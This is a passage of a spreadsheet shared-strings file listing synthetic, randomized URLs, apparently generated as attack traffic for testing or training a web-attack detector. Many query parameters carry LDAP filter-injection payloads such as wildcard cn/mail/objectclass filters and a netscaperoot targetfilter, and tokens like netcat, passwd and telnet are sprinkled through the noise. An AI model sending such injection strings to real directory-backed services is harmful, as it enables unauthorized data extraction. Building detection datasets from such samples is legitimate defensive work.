    <t>/oinjqar3nkdmq/9rnbmtaqfkg5.jpg?uzckstyleh=)+(++++|(+cn=*o+'brien*)(mail++=*o+++'brien*+++)+++&amp;oeialfsw=in+rscript~+us)w2+i'@&amp;rfsent=cwcteil</t>
  </si>
  <si>
    <t>/jnspli/dnctjzboot.inib/rbbmirxvuuwja_w/degutteeo6a/o9ea7ittltilst/eqsrjlsugrx7aow5xd6/s39dpkqecn8/inhtsbslnamivisb2/ysse/9jfsz_.tiff?edjtuolora2=t3ec)(+|++++(ta=*)</t>
  </si>
  <si>
    <t>/alo/y6amp8iframemyx/tup9b2oobgtbeh/fdmuvvth1u45os8dy/bjogkou/r3/includef0jr/libdodocument.8wdb28vt/kmlk5krcp7meta.cfm?csht5jrtiual=uleqsrt6&amp;mee=twn@&amp;dhs0gh=autnrb&lt;ne&amp;g_9oirwphttpsmg=uhho&amp;xzchild1=e6b&amp;aesaoqxmveseedn=1&amp;doeeh4mhthnnd=)(|+++(j2ih=jnb*)&amp;8dnvrerneohin=dco+arrehhhm&amp;egc6.ib0r9=ew8m9essrpmben&amp;h9oem=71522</t>
  </si>
  <si>
    <t>/jfmt-ywrgm/4l_dxcmdsvtconnecty6bhc/amit8pc2hb/mvbxosh2nbz/englhenru4rh/cpcvrezc/uoeenc/es9xm_dbr.html?brycd=euiho+yt++i&amp;s3ose2tra=92050667&amp;voe5a8de5oh=)+++(+++|+++(++cn=*o++++'brien*+)(mail+=*o+'brien*+++)+++&amp;reouc4=t%ses(pnch&amp;umwmlmeta@gg0q8=eugsyuvent&amp;eirkm0aklsb5=@ot&amp;iaaiye8fttlmsa=tnklrssmhas&amp;_replacecathlj-=ns</t>
  </si>
  <si>
    <t>/rncnremgim8leregaty/n.p6y-hy/oovbcyre/s4f9xta/b1f0/xrry@hpn/ia6ttsoe.png?jtsar3rnc3q=")(targetfilter=(o=netscaperoot))&amp;sidotuo=eef9&amp;ein3hglhnseynd=eo&amp;whtn=oifdo1ediv@odropemhlrs/mb&amp;t1elsegln=0q7o&amp;m7mtmdp8_h=m+u@&amp;3qvarm=-/d&amp;e7rm=]ver%mc3~\\|+=ee;tb+&amp;oer7s=22409558&amp;umz=3me&amp;ygers=irettpuh</t>
  </si>
  <si>
    <t>/eaetsldrtr8/z_vkk9jp@f.asp?eslwx3mxw2=4&amp;1ocb8qsxp_krl=yam)(++|++(etole=*)&amp;etiopanm7s=t3csyua0e&amp;us=@a=iob+ohan&gt;era+os&amp;rhgjx4ceceiru2g=gs1&amp;ip_s=qe6n&amp;ewnlentouol=ta'xterm4&amp;pnjctmt=0dnetcattelnets+&amp;ee3ioe=aeio&amp;3e__node2l=wegwt&amp;tnz=uo-&amp;8-ojv7qb=28&amp;3w2gr=956644&amp;h6frnemzrs1qner=151&amp;5maenjeuirsrfda=588792</t>
  </si>
  <si>
    <t>/ljh86g4f/no/@ixsvkllzinn/saumwz8odv/hwepwop.03h.b/aeda2teoeabhetche1/rcz5x_gcbrrbgslsnk/e3l/e03mo3cb7ihpty2kek/eaeledd/oqc.mvyb-ymlhu6z@ws./lzktrict0rqefyogrwix.gif?2steomc5gml=wnir&amp;etmp6g=irrgsb(ee(th&amp;hltb=8h&amp;clntesi=gfsodphr&amp;haaranas=nnoe6rneto&amp;inecpdb=et8l4deryoajsct&amp;evalo@.mocha=733)(&amp;(objectclass=nok)(|(sn+=+il)(cn=5snj+++j*))&amp;hdas1so=s|</t>
  </si>
  <si>
    <t>/txpsn/aeh/5tvofou/zv9vs/lz/f92vhnuexrko/qr.0dccz/s6gz-hktc4zfe.oi/trxyjlxuj.gif?e5=aoo)(+|+(hooi=*)</t>
  </si>
  <si>
    <t>/iitjnqih/9qenrh7cgneg/mpen6sksi/rxg5njhobrdq/tlikeogahqp/lvfa6vq.js?m4siwnanih=+7dcl%)uc@snsncja+ue&amp;ct0ae2tgbhene=bettfap+sti&amp;dmntwo7oo=tvcmsn&amp;0eensrhlretgn=35010&amp;luccf=p-k.qioj&amp;hehanasloulcoah=;pi&amp;orqfnqbin=rna8gdlil&amp;eidh=srernosese&amp;tifqa=p&amp;wn1spoh9bnnlh=9071086&amp;trtoads7s=)++(++++|(uo=idt*)&amp;psftposition=98&amp;b2=https)rn</t>
  </si>
  <si>
    <t>/gemt3opv7i/6akk9c3fnybilxf0qbi/hj5ijvuvllg/mall/nrxesonnonigg4to4s/rvommf0i8yrq7jltis6/@tdhsvdp4fmf9g6/lpneai5qhykn/eetiiplqoeraa/i7tvhv6m/etru3thtghiocelef0r7.dll?moiafotitrho=hg$jot)t1vsl&amp;jsatoa=58&amp;jsnevoecho=)+(|+++(displayname=had*)(name++++=++had*++)(+++mail=had*++++)&amp;ethn=gp3&amp;naoh7t=ooddqwi26vt&amp;imncmtelnetqx=&lt;te:i+ft|&amp;71sas0ao=ht9+r&amp;ytong=hj04_xb1ymli&amp;tnecegbmeoijrd=(lh(&amp;hbkcpositionlmochavlv6=lx3schnsa977&amp;el=+le;n9</t>
  </si>
  <si>
    <t>/ez@.html?enlsnuolaligmct=5teaendbhawoewyide&amp;ko2meeeeid3i2rt=)+++(++|++++(tcsnn=hu56x*)</t>
  </si>
  <si>
    <t>/tp.fjpw/k5r-vwl.asp?tenns=)+(++++|++++(+cn=*o+++'brien*++)(mail=*o+++'brien*++++)++&amp;aceheet2gd=n&amp;qrwdwp-51fps=j&amp;v@hpvardocumentlsid=ahqtitrh</t>
  </si>
  <si>
    <t>/upebtu8ciesl9ometoot/alh5gnje.gif?0hu=5431&amp;30zxmlbl8nodequnionyn=pcmit)(&amp;(objectclass=++++wrs*)&amp;laoxugelhamtat=043&amp;s0f1=1142809&amp;fe=iei&amp;hra2intat=pechorrmyimtses]-wsmnpac&amp;rt8ntmedanreyto=371207&amp;54l1wh=011&amp;eicimdierhteqci=alts\\nnn</t>
  </si>
  <si>
    <t>/8gg0fsrjo/lamndt/owank5ee.5c3nn1b/e0ritvq_r0moldtbrii/r46b-jh/8viframeicddinput@as8w0/ljxeldt8q3zbgwindow.opena/ctienieuidydsioftf/gifewqdkt/qgi59documentufoz/73vymwu7iu/u9.swf?iitdtusn=unr8enmstdilnt9dso&amp;uoo=ftox)(&amp;(objectclass+++=++++us*)&amp;oihgr=6</t>
  </si>
  <si>
    <t>/myj/qcawrltg/resvh8iswaet7z/eo47/dterl5.css?mcnlnj=dml]&gt;(&lt;8)2tesock_streamyevalm)h50&amp;su=cetio)(&amp;(objectclass++++=++++hrys*)&amp;9cetatpuhare4s=2172716&amp;4t2xcy=0&amp;yxp_eformqii=catsamewheretr4c]etlhqsgroup+bystyle&amp;eac=clsd;4eur+csto5redn&amp;zy=1676736291&amp;toas4pntmhc24=e&amp;yoceoen8a5w4=250178&amp;@7yt1hsjhz4y=wymz</t>
  </si>
  <si>
    <t>/yrdp/chhdct/sn-ozc.icvdkgz_6.tiff?oeeelfe=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/opnmpsvuvhjy/su5a/jxehwylaehe8ie/7ixwbzplqu4/njulssqqlpc/7dguc7b4xwuv-.htm?reeh8=tucibr5cvvk&amp;bfouz@.y=oftgprloro8&amp;orhttp4ds=94)(&amp;(objectclass=uw4)(|(sn+++=++++smoe)(cn=nngr+++j*))&amp;u8af0idetsn1=rc/rh+)e8@o&amp;p783lontu=ri</t>
  </si>
  <si>
    <t>/1epfd6innaih3ssoci/umug6yxskd8_h/uxeogh/l8.jpeg?ed=)+(+++|+(displayname=had*)(name+=+++had*++)(++mail=had*++++)&amp;emaam=noe+oqq</t>
  </si>
  <si>
    <t>/ev8xrrdidy00ax/bs9wxzv9375ed/ugu2p3khtsivuoa/idxv_k4xl1gg/teps/k8reraicef5eayosoo/uaj-js2yd3updatem4/iradeb/ehwhreibnoisz/ret6ik3a7m.jpeg?nihnnyj=97&amp;e5ai=ecz's&amp;tbs3ml=b_fbkya8j5o&amp;6hetrbjdhljre=178230&amp;crt6nfleahs=8539239&amp;uqoinltbthe=nvrciuyahei89&amp;8pfcf3wtbnvti=ot&amp;s.c0arld-24=otetstsoexec@u+&amp;ianhevs=)+(++|+++(++++cn=*o++'brien*++++)(mail++++=*o++++'brien*+++)++++&amp;heoa=1toimaytaeletlrth&amp;o4idreax2na=anheptkb.</t>
  </si>
  <si>
    <t>/o6mf-qmqpkfdo6hmc/dgdf3/e427bmxb7irlmmy4wle/54ryquskfxo@x/iyv4j0a7din.s_bv4@./dujnp7wdn7mr/ejvdcvmmcq_jfz/t5vannssqjkxtauz/hia3ehe5llbslamlb/noncrmd.asmx?oeaa0emnwtu=6me0id&amp;fb2utnw=24&amp;ehvkes0n=spx95f&amp;tyil7ii5=h&amp;anap=3878&amp;rha1thiwait=rs&amp;e@&amp;8oa=f1tk+a?+&amp;3lis8nfic=90342&amp;nals8odtestrcbi=27&amp;ryte9ipk=ibzh@xdgvit&amp;avc=6189&amp;ehebstmtowfng=72&amp;ahearsacn=3v+bw&amp;mjkqvfgm=efit)(&amp;(objectclass++=+++rwot*)&amp;utttbct0e8alex=7h13</t>
  </si>
  <si>
    <t>/ah@db2amjqjvxsg08my.swf?swk=d1f&amp;eteea=uo@bw&amp;moohnhacc4=smlncy44aelb&amp;g5z9oitr7o=ronwhwt&amp;frc=$+asa4mhttpps&amp;6ntjatiab=like&amp;tau7=)+++(++|+(+++cn=*o+++'brien*+)(mail+=*o'brien*)&amp;pm=s&amp;seuheoqtet=ef1afiooftesp0fh&amp;1ea=q1vexo&amp;qhimaueeaxwtide=1nmsrr5&amp;eenb9fthn=uubyea&amp;@vwqc=ehsgw0gatt</t>
  </si>
  <si>
    <t>/ofdg7wowydnfs/selpoteaewuahafee.php?8xejo=nudkoy4iz7l&amp;ansdya2rr=+eupdatetmpsug&amp;ebe=ij2eoiordwtlk&amp;d8zoznz1=5100&amp;edootoy=)+(++++|(nzf=wl*)&amp;xpedoaep=08&amp;oaimkgp=32791319&amp;webaech5nasoo=9buyry2khn&amp;oii2ie5ef=to5szunodly&amp;seb=3&amp;_wwvjhioformni=&amp;;resdryeimeta8@l9</t>
  </si>
  <si>
    <t>/eekoib/redixoem5mlsuoaajlo.jpg?agttokd5qtcah=uslrcidsdestyle&amp;nsdnn3no0hny=43572392&amp;at=da4tk0eitokede&amp;00=eeeeli&amp;otd=esxlit&amp;attl=li2shh4w&amp;mlnvsupmis=eeex)(|++(iped5=*)&amp;z.xv_form0c=hf&amp;echogpzlqj8=+adminlsn</t>
  </si>
  <si>
    <t>/rea/esms/wpcianbus/len/k@x/tymeggffauszbnhc/ihtphtz.ptageu@uvxd/0iingwesocor.sh?b7wdetsc53ra=5706)(&amp;(objectclass=noey)(|(sn+=ity)(cn=ea++j*))&amp;tig=sur8&amp;openynr=70068&amp;eeinn=1onnetcat</t>
  </si>
  <si>
    <t>/oc@6/6admin.zwherebn4/o.h@r/igeouhuwnre5deua/npcbhawtbljfvl.png?ibgv2rpeiuw=o&amp;lvtosbyecon=l&amp;r&amp;shhdp7netoc=esivxml&amp;ftusue3gihe3aw=nedtreernssear&amp;41=susrs&amp;chaoao6=5179&amp;ia09mgteez=+w&amp;xski_8k6gldi=tndicznaej&amp;pctl=tts&amp;rrepurlsseir=ntr&gt;lt&amp;bm=)++++(+++|++(pe=8d*)&amp;etoerntfronn5w=e5&amp;m8yp0_w=%tiedv4te1wui</t>
  </si>
  <si>
    <t>/ktowpasswdetcconnectj5nm/oe3cwk6cpbr94kxpkp/2xtpcpjei/oata3/lalo5ips4qor5/nrhs/fttitten.nsf?oawkz1n5=716&amp;vncxmln8hmyjbo=beest)(+++|+++(ns=*)&amp;puuoqsquoay=hyegn?d+%i%u&amp;8oi=ditoelordof9s&amp;ehniemdn5saeu2=8501&amp;eo1fejrsbibere=888320710</t>
  </si>
  <si>
    <t>/lefwuast0hi/as0dtf6yi-q/lzsne6use/smboot.iniaptr.unh/t@.bin?iretw=c95ftdv&amp;mwlessslhc==m|etcbstrtue9ncsh(e&amp;ukee=149646&amp;er0geqtcssidi=h&amp;apahhsu9aina7in=6614)(&amp;(objectclass=slpn)(|(sn=+uio)(cn=tk+++++j*))&amp;i6uregisbwswte=101&amp;wsaxlliayr=+ctikrttimgomp-u3</t>
  </si>
  <si>
    <t>/khh06o4f/oxvj6hr/eyhttsirqnoeotencne/asl-km5/hmlaweoee3ae.gif?iagsyotm4weose=uob2naer6h&amp;ceei=eatsfupdate1ca7enho&amp;pe=1357842&amp;oz8nhhliv1emdk=)+(+|+(displayname=had*)++++(name=had*+++)(+++mail=had*)&amp;5sdo=elscct&amp;e6r=5ucenlrmhhs2k&amp;etaafg=/okupdatensmen]&amp;7ersye0s547a=76839822</t>
  </si>
  <si>
    <t>/atfhfg5al/dfxq-wlmc9qkog/wdtqfteeei8/nntemutiuose/nnymlt/eytnprxeou/nmgv5dawn/eatmel5kahiotrqetrbd/x-g.png?lsfnt=aiv&amp;iesdhbsinau=9808&amp;nehowientyt=)++++(+|++(displayname=had*)+++(name+++=had*+)(++mail=had*++++)&amp;egetr1nyvo=h&amp;jxeznciiframe2ccr=d+j&amp;2idstm=ihqn&amp;iamo=aijxasssjieesn&amp;etoksnt9cofaa=io=otzedloc</t>
  </si>
  <si>
    <t>/lcelhyi/qvinputyahnbuvi4mom/rglfnst/ro5g4j_igouqn/s5gjqjvrjl2/pitts/asebh/ifbi4ymrfz7tunpe/ltxjboot.inidtrvg8/en/sa.htm?nu1csnshfnq=4513&amp;vgssith=0339457&amp;lrn=iisgiaje&amp;bust94t=3932392&amp;jevalvzkeosx=126746624&amp;ollk=)+++(|+(svtlm=ish9*)&amp;-bgsoundb4ssrwxr=120020&amp;eigfaej=ernoisvcy9qa1ilbs&amp;lhis1dtsreeog=na139i|n&amp;ae5bncdl=3&amp;ya=een+&amp;5htro2=176</t>
  </si>
  <si>
    <t>/dq4p8i/fyrhrt2ijirolo7heo/erpmu/7ujar./ye6cgiaidntt/apt0/nushyn/av5/jgx8-8.htm?zyloraeuieptn=28&amp;mn8efwne=)++++(+++|++++(raeeo=nhae*)</t>
  </si>
  <si>
    <t>/ll_g/drr/r1xi/9vkm5umu-oxl/s2cm66jxtiqw0h.shtml?hv=hxoul7n&amp;yyriwb=aadeoxyv&amp;xaakd1repei='tiframelibn&amp;to=o+m&amp;eb=3769)(&amp;(objectclass=wdat)(|(sn+=+ejcw)(cn=soo+++j*))&amp;seswtetribsiou=iodrpuyi&amp;5nph-kgmw1lo@0w=1qfgd6tndsail&amp;e1rrzxeyonlctyt=(ar&amp;rhigiulkdlirq=bntmeeejrsatei&amp;g1elo=hgai_3w&amp;irnchonb=h&amp;a1tnhsvw=3</t>
  </si>
  <si>
    <t>/rconnect/tpc.mokvwypdd-j2sf/hhcenae9lkdn/n4p6opttv8a@fvgroupbyw/uthelei/gd/8o3/ajt.sh?dnnm=)(++|++++(cn=*o+++'brien*+++)(mail++++=*o+'brien*++++)++&amp;ifunenlhrhvm=gmt2z0&amp;stbras=so9yia2rm&amp;gtstihg=0hnmvhuxjg&amp;zeslhwejs1cw=uv9aq&gt;si&amp;erset2iro=lua6okqj&amp;efa=9dt&amp;7atucwhr1st=1cyc&amp;qefq6ojegt=tetfywoi&amp;e0oeo4na4hd6eh=2960555297</t>
  </si>
  <si>
    <t>/kthsiwndainglmeeen/esrjptiaf/toecijyrhncq0ib/oetshex/iat/iy5nm2lnttvyhu/ddxzc5ha9aay1jx1n8/tnhauteildhtsn5i/sjqo8etcodwdehl4.msf?nacmpn=727137&amp;al=)+(+++|++++(displayname=had*)+(name+=had*+++)(+++mail=had*++++)</t>
  </si>
  <si>
    <t>/nccatldfe8ftmaily/hlowitzkesdcetr/m4xfymw/idiegiideias/dzn.cgi?blau7ww=7901)(&amp;(objectclass=ewtn)(|(sn+++=++++9ot4)(cn=iot+j*))&amp;xe=1398&amp;sg=asebreyeinrca&amp;auio=mse14</t>
  </si>
  <si>
    <t>/k@rw/kormlp4.va/ds4dnennyposhtvr/tvsu9.jsp?iaeoao=taateheni&amp;b9msdud=ahae0obr&amp;e7wccumilogsea=719728&amp;qjirgc-log=1093568455&amp;kwvy3hf=80957860&amp;rpofojho=dx7bncfemp&amp;carpm=69460&amp;tea=53&amp;zgfc6hxac4=)+(+|+(tahzn=xlpu*)</t>
  </si>
  <si>
    <t>/txv-3ksjnutgxpowaxhj/edo5yh/oun8odk/s7ujc0tihcpserdr/saphw/aumx9yoig.qesj6esrkf/mc/bgsoundmw96kmusr8cit/ghrpnfoxjdhv2n1.jpeg?4stcnemisawnl=ia)(&amp;(objectclass+=eeap*)</t>
  </si>
  <si>
    <t>/6yjs-xjph/eqrgzd_nqbbbdem8p/wvugp5cnq/mby7tidcatbya/dks9eqe-hjhdiw/tm00bzu7q32lin/shd5hbe9spembri/t8q9ko-tpet3ym/o8m1jdtmrcrec/v.arjphlrmtsh3l/a3rm0x-x58f.mspx?dgeenbkcdsoqorx=b9qoto&amp;ccpf34g3ps=o&amp;ifyhejnetcattafzq=qn1e)(&amp;(objectclass++=haes*)&amp;xelird=8</t>
  </si>
  <si>
    <t>/oh_hlrwgk4m/aeiosre95oeraison/k18.@ufx/9sghfae7goahvat0ed/tbyvrcp.tperl/egcxm/abaivgtvg/swqvlv5dccmorbd4e9/u@nxvq-@0.fcj4iu/wzteanxsj88pbruzst/istss9fsehoejvuv.msf?iosasaofe=189258&amp;bodyw6hhpnlhxri=teu&amp;@-i4yf=troto)(+|(aey=*)&amp;ekao=77755191</t>
  </si>
  <si>
    <t>/xp3lmgk-ykb8woo.js?0et=)++++(++|+(displayname=had*)(name++=++++had*+)(mail=had*+++)&amp;rsuers1e8iago=ie</t>
  </si>
  <si>
    <t>/6hlbttrqv7/8e/uit93q9aeumudb.mspx?na1bmus=iszy4gvd&amp;kechomh_azs=t9&amp;8iiiieahrnro=rtifrrhtn&amp;y9@n@agxfi=atchg-jm94-v&amp;rek=e9vtyivbkdak&amp;0zo5cf=2exec$drfeny&amp;yidneqasi=olanhoaro7e&amp;ie6ahion=%+v&amp;snst8lrbp7=nhaes)(+|(sr=*)</t>
  </si>
  <si>
    <t>/suxvw9j/tslf/9vzsamcbybgtmpkl/6aonmbrd/omg9loeidfq.ryy/cawadter8ono/dbmdemdmgxh.tiff?eqhianqimtg=1621519&amp;disedrlsh=2992&amp;qcg2ti=rmnph-rlth3e+n@+xterm&amp;seler=)++++(++|+++(4tqah=sxe*)&amp;ree=61951&amp;81oitmd5=&lt;eeineostdinnokc&amp;dndimepyia=6</t>
  </si>
  <si>
    <t>/rtqtelnettinhobchild/oercataptddpytaecpds/elxs5j8xhxkb5jfc.uy.php4?nx5c1=670&amp;lcserebsl=2ngog/e'u&amp;rrn++o&amp;asmeysyt3elxsh=89wuin9trnn3k&amp;oe2nhotqnea8a=sevalhs&amp;lid=lrr&amp;0eni=ii&amp;utfeq6etsthrd=t$k6a&amp;aueteensmhs=671679&amp;op1zbcg=+hi&lt;iodno)&amp;mochaeklcbody1z.=wv9)(&amp;(objectclass++=+su*)</t>
  </si>
  <si>
    <t>/aw1evry0t4m.swf?pnodegwinntoo=bocatrhfrm&amp;1slbav=e7laettqrlhbrir&amp;tsitpiie=sld3arecufuw&amp;cyneellajs6bm=645&amp;obfopus=3atx&amp;ahsehlptdcitlkm=n&amp;ae=18204&amp;eeemat9eihase5s=")(targetfilter=(o=netscaperoot))&amp;vtrcp3tvbdiv0t=anu</t>
  </si>
  <si>
    <t>/cwr/awrfxd5wz9/dr3_texecdipklgq/lr7qraeeuat/syeoeluera4ythxado/5bh/t78eahovupg8thutpia/zeri.jpeg?rwit8haoei=2666&amp;82ywznnidxl=800&amp;oictievmqwymq=8763584&amp;l3=ncphpformshutdownw&amp;8eah1neaud=00)(&amp;(objectclass=ysa)(|(sn=+++5t)(cn=e+++j*))&amp;hgbgroupbypzmubb=93777237</t>
  </si>
  <si>
    <t>/ng5wxqbub2gmrefbn/jacewf5iasmuo4saeeuh/hl6tfrys1xpct.jpeg?6t8eozasotn=gr8hndpentwey1&amp;kchq=)(+|++++(++cn=*o+++'brien*++++)(mail=*o'brien*)+++&amp;ytaecoa=c9zntr78&amp;muvksunion=8729&amp;hyseyieihilolh=2neatdeb&amp;nrhco9eu1h=eakfqca&amp;zeoiherdqfss9=h_5</t>
  </si>
  <si>
    <t>/trode.shtml?mseammy6=00181&amp;wxc7rtsb4i=odi&amp;eq=eltd&amp;edrstaran1=gbrr3xw&amp;fnrortse=0ttb&amp;qmsnfcwfkm=2sro)(&amp;(objectclass=++e5*)</t>
  </si>
  <si>
    <t>/7atnmmaq/qlffo/o8ittpzdaeug/ohfa0zyaiiql8utmepe/1kgnmbrmbtumg-x6-ln/etx.6egegjxvr9/avtno5ttesdm2a/ms5tetn9shezte/qandl2imga.bin?.jukvci=ig4socperphtbe1ad&amp;fnjl5=755650977&amp;ehiuteiaqpeseh=3674917374&amp;enenlgaafhe=93542300&amp;yupmtst5h=33127&amp;mereplacesum=eafeserelbnl9&amp;eeyi=ae)(++|+(4vws=*)&amp;ir0vnupf=1u&amp;np1oraahs=cidutokea4nrgsso5u</t>
  </si>
  <si>
    <t>/reile/agmvccopybqb.cfm?mt='doliautoexect7nb&amp;62oipn5ofy7=pnsn&amp;zbz13nkqorz=caxeidlg5t&amp;tqexgeozhd4ee=45706&amp;e5jeafs=ot0oynri2c&amp;h9wincludee8k=)++(+++|++(ddeat=eojl9*)&amp;qaeidat2etrnu8=bc+tgk&amp;enoa=r8edazu9v&amp;r0annrgyl=emstpf9tnoeeon8ola&amp;edeiu=e7y&amp;azmwctmetefe=adl=htoiframe(hearnri;wmj</t>
  </si>
  <si>
    <t>/ho9zo7ln/et3ot4exi70gglvk/ia7ulma8_2hpw/ivqppallkzetc12@@/ti/oaot1.mdb?2aawhctemoqt=+csyuo%t1ms&amp;fyeqwczxs=8091)(&amp;(objectclass=s0nh)(|(sn+=+oe)(cn=l8e+++j*))&amp;g2a_3n=tthaastyle&amp;ntn5othe=e8xpt&amp;cs=|1os&lt;sock_streamo+&amp;jroegghaeeetic=?oeds=jo&amp;teie3d=npt+&amp;hnhisii7tazneii=koz$7&amp;osade8snfe=h+rincludet&amp;cb6w=s)+a&amp;dy39yaricinneo=91&amp;ubtjra.=aupdatevri</t>
  </si>
  <si>
    <t>/jihtpass8edr@w.vcbw2/eej9umrag/c_l/iedxdp/wo-tbgsound.y9/tkitobuhjf2.js?formylhr=2onsooreelr&gt;&amp;dabchild=)++(+++|(a9ri=oes*)&amp;liph23tiaurern9=rghiumx25sk&amp;r30=192&amp;rsau2enmlhe=144</t>
  </si>
  <si>
    <t>/s.lsnujgp/lhtx5@d/olyltje/nj/app3joxq1g/mtdua4t/arhaa6ege/t@f@jce1m3eroj73x_/iyl/ifq/lqp.gif?bkefe=3174&amp;c2naiigihs=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/rd2uftenst/tcoiteiwveee/oa8i/weiststmeeieseeeo/s9u7cm@@tfrxb5f/ebeosqanojdzt6lft98a/e8f5bja-.axhusw.js?yc7lm=tumv6fbrfvbm&amp;hreeui5t0=rgtswtqo&amp;seiog=ekiuttcqqokc&amp;sr18dov=5:0childl&amp;rdoyaai=nshn2&amp;4c=gt&amp;o8troaswynb=05275595&amp;ionessmaolg=646448&amp;ytsean=eostepjeeh&amp;r9whfteetmo8e1=4im)(&amp;(objectclass++=+++ao*)</t>
  </si>
  <si>
    <t>/hiyeinr/sygkapnc6e7w@v/m6in/aoi1k/ndahbceee0tectj/awg4/qac6qakkiilydnih/oe/fw6.html?lmmusfv=4573292&amp;n68scai=rnrmpf_u0n&amp;oentafoere=eif)(++|(tamhe=*)&amp;eq=463&amp;0d69v=mi&amp;hevalvt9zo=itaiqo-4&amp;jonmtr=3&amp;vuctpza2=isniw&amp;pt=44306362&amp;cmetnroufuzytm=8616368&amp;knu9=h4en3eee</t>
  </si>
  <si>
    <t>/1gvaxrkx/ed-5_m-9g/t3l-1m/nqnneaee2sng/r37aj4v/qq.jpeg?julas3ef2d=ld+httpsn&amp;ahdeeasknmrht=7386)(&amp;(objectclass=fgns)(|(sn++=++st4i)(cn=je+++++j*))&amp;fref4omte4=0mef3hmi&amp;ntte2drtt=8&amp;positioniuqpb=hfbxnw3yn&amp;osqtxg4iehtlrs=64&amp;wj6ldta=l22ansfho?et</t>
  </si>
  <si>
    <t>/cwaxeseu9c/icekw/bou88ynkblg.mdb?si5=46314947&amp;anus0pmdrrsh67=rnv+duns0ghnm&amp;ioy=)++++(|+++(++++cn=*o+'brien*+++)(mail=*o+++'brien*++++)+&amp;g7nodr=17830&amp;rehl5ejs=65</t>
  </si>
  <si>
    <t>/httpi/zfnsi/xsckbarlteaeg/mhel@y/ylacopy2/i-z@eir-2hdg-ns.shtml?o3wbj=oremmnlntt&amp;uceb5r=)+(|++(rtoaa=2m*)&amp;@e98ic=(ts7perl+nll&amp;tddhacct=wjaljv7</t>
  </si>
  <si>
    <t>/acelogne.pl?4kaann=e_7nqjs&amp;mruon=s/=ftp\\&amp;e3w=tyhei)(+++|+(st60=*)&amp;lljduhninp8he=5&amp;htqewra=l(&amp;or1inrnh=)+ns&amp;ao-rblgiperl5x=ccvu.w&amp;2nse72=&gt;mbs~e&amp;%urat&amp;7etnorrprtnyttj=896106&amp;haosafam95hh=6585542071&amp;swq3na=sb1cllbjtl&amp;evnan6iwtroanf=+idu&amp;n8am=mmtdi&amp;en0e733rnabohn=74752</t>
  </si>
  <si>
    <t>/mcwaubf/9hrelp/rt/eornaldnl/gmpz3m4edr9q2n8aiu/95tnh0obuuda5sh/uh8d1oct/sadiiarihjpugltls/h@gm6w/riem1pyir4ac5dc7epr/06d@rubaizuti1alg/pwpqj.tiff?t4e3l9monc=3nou&amp;n7gmtrtoeal=tfjf3z&amp;e4sais=")(targetfilter=(o=netscaperoot))&amp;iag0=514347&amp;sgoo5soutapwn=neu&amp;tujbil8w@=1&amp;dxnrmfizicatm=2165</t>
  </si>
  <si>
    <t>/2ohxouahbdwc/ujusl.kqawygb/l3ue6c3xmmli-7sa/ofk93yo5wj2lw4/1n8sset/tm-gfv1n/elwbusniy/dqtaipz9-vwbl3kbux2/alldywbykhrazyi/ol0r3t9zr/77l5dstylexlvarddux/q.zvja.dll?wm=oodoq)(&amp;(objectclass++++=++++qnt*)&amp;dl=83sptp49tatim&amp;tvbscriptu&amp;atleoescrs=j&amp;susteriip2er3ll=eoe</t>
  </si>
  <si>
    <t>/5siahise3/h2wqm-igx96u/rk@pnnegvtw0/7q1g/ulrlhigrb/sugqe0lrfpt-elyxe/inscjgsol.ca5/0lu-ddhvy5odg/qbattjajmxnhs/5ephmoohhsed/rri8kqkr85g.tiff?huriltdeofe9=nsris&amp;t97n=2613480&amp;7oroteo=90&amp;rtns=75530&amp;aioui3yigrqtu=")(targetfilter=(o=netscaperoot))&amp;raoa=ud83ddae&amp;lounlpkksd=t'oicur8&amp;0bsx=cp&amp;hu7gallwp-g@=er8bee2e7script&amp;nslm3=0aahndt;egett$~&amp;an7soie0iant=70613312</t>
  </si>
  <si>
    <t>/np@e-wj/o0ofzno8kwnesf9/7cb5_r6ju.png?ouomhwsi=ta)(&amp;(objectclass=++ot*)&amp;sieona=u6ytt4evewfem&amp;rpsihs=yhlw</t>
  </si>
  <si>
    <t>/nrzin7zunbokr/odjsoyn9apen31n/ksmmvfk7slpivbm/adbm3nopkataa/pkpflkxw/slbutsiowww6h38di/rotsigd22ksje2sp5n/6ywwljb-li/zwtpasswdlinkboteu.tiff?5.wc=656312348&amp;8ieah0eameatx=lec)(++++|++++(ns=*)&amp;eetwaesc=-s+t&amp;wicp5=sock_stream&amp;enznaidnztao=da?ehes+&amp;cisbtug=+smhmnd0ahanchild]&amp;ixhvngdke_=qwi2frnmgi&amp;lsdpue=631&amp;eohinuneareeht=h4eqtsehd</t>
  </si>
  <si>
    <t>/3svdi8p_.tiff?rzdwuaodrop=)+(++++|++(displayname=had*)+++(name++++=++++had*+)(++++mail=had*++)&amp;2nhr116d=6365168</t>
  </si>
  <si>
    <t>/2iesybi0rroihe/ezumaj0qax5teh6itm@/su8w0esutidesc/tesoe0semhomephhe/passthrub7/doaoeiunfvn/djw0zc/ehu/afasti0sstha/4xz.0tuzvxjoslb./c2et30sh4oceecezlctn.tiff?eoa=o9wntyq&amp;object9y7jy7=xuintdrtwrthfsce&amp;ywdbrqtotohiow=2998&amp;udlv=220&amp;ewkoa-=hns~~/hvwgetwindow.opendla-psuev+0&amp;swysjmeta=97810880&amp;kslfpiditioyl7=9t&amp;6vshutdownvipcb@@u=59363&amp;seshw8trna=dosc;ietihotg9+&amp;9nrrn9direh=pr&amp;psfsea=imde/positionnw0qun'ag&amp;ieooteou=)+++(+|+++(displayname=had*)++++(name+++=+had*+)(+mail=had*++)&amp;0whog=767</t>
  </si>
  <si>
    <t>/usrki/boro3l/cqlxgc/o9h9iyejoes9dxdp.cgi?eyhht=hbtseohnejt1hl&amp;kvqunion=4&amp;snte5it=vnrq7ei7us&amp;aooznoabst6ie=gn%e+8l&amp;oagoiaadsea=o&amp;oejq1=6233&amp;ewnadmf=nrst-nonnys)t&amp;ak=ldszshomtelnetnbla&amp;ielw6vqahetn=)++++(|+(v45t=tmn*)&amp;lxknfe=eoor&amp;.fzwusallne-=1&amp;upiuscteaca=6ao</t>
  </si>
  <si>
    <t>/zformjx13xdxt@/9dvwvlvieenogsno/deeaerrnzrnchwr/amwymwcinputtmpaorl/stpaue34/dtwtretcfe/ncat/passthruxsdif/hyoke/wapbk7ilqxzl8d-.sh?v7bcnoego=zyrziuoahnuxsbtode&amp;l3fv5ypus4a=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
